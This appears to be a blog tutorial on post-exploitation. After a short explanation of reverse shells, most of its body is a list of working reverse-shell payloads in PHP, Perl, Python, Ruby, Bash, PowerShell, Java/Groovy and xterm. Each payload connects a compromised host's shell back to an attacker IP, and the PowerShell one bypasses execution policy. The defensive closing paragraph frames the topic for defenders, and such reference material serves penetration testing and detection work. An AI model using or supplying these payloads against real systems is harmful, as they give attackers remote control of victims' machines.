Post Exploitation and Reverse Shells: Understanding the Basics

In the world of cybersecurity, both offensive and defensive teams engage in a continuous battle to gain control or protect computer systems. One crucial aspect of offensive operations is post-exploitation, which involves maintaining access to a compromised system and leveraging that access for further exploitation. One common technique used for post-exploitation is the use of reverse shells.

In this article, we will explore the concept of post-exploitation and dive into various examples of reverse shells, with a focus on PHP, Perl, Python, Ruby, Bash, PowerShell, Java, and Xterm reverse shells.

Understanding Post-Exploitation

Post-exploitation refers to the phase in a cyber attack where the attacker has successfully compromised a target system and now seeks to maximize their control and access. During this phase, attackers aim to stay undetected, expand their foothold, and escalate privileges to access critical data and systems.

Post-exploitation activities vary based on the attacker’s objectives, but they typically involve reconnaissance, lateral movement, data exfiltration, and maintaining persistence to ensure continued access.

What are Reverse Shells?

A reverse shell is a type of shell connection initiated by a compromised host to a remote attacker’s system. It enables the attacker to interact with the victim’s command shell, essentially providing a backdoor into the compromised system. Reverse shells are valuable in post-exploitation scenarios as they bypass certain security measures, such as firewalls, by initiating connections from the target system to the attacker’s system.

Now, let’s explore some examples of reverse shells in different programming languages:

1. PHP Reverse Shell

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

2. Tiny Reverse Shell (PHP)

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.9.36.167/1337 0>&1'");

3. Perl Reverse Shell

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

4. Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

5. Ruby Reverse Shell

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

6. Bash Reverse Shell

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

7. PowerShell Reverse Shell

Create a simple PowerShell script called `reverse.ps1`:

function reverse_powershell {
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
}

powershell -ExecutionPolicy bypass -command "Import-Module reverse.ps1; reverse_powershell"

8. Java Reverse Shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

9. Xterm Reverse Shell

xterm -display 10.0.0.1:1

Conclusion

Post-exploitation and reverse shells are essential concepts in the world of cybersecurity. The ability to maintain access and control over a compromised system allows attackers to explore the network, escalate privileges, and carry out their objectives without raising suspicion.

For defenders, understanding how attackers can use reverse shells helps strengthen security measures and detect and respond to potential threats effectively. It is crucial for organizations and security professionals to be vigilant in monitoring network activity and continuously enhancing their defensive strategies to protect against post-exploitation techniques and other cyber threats.

You may also like: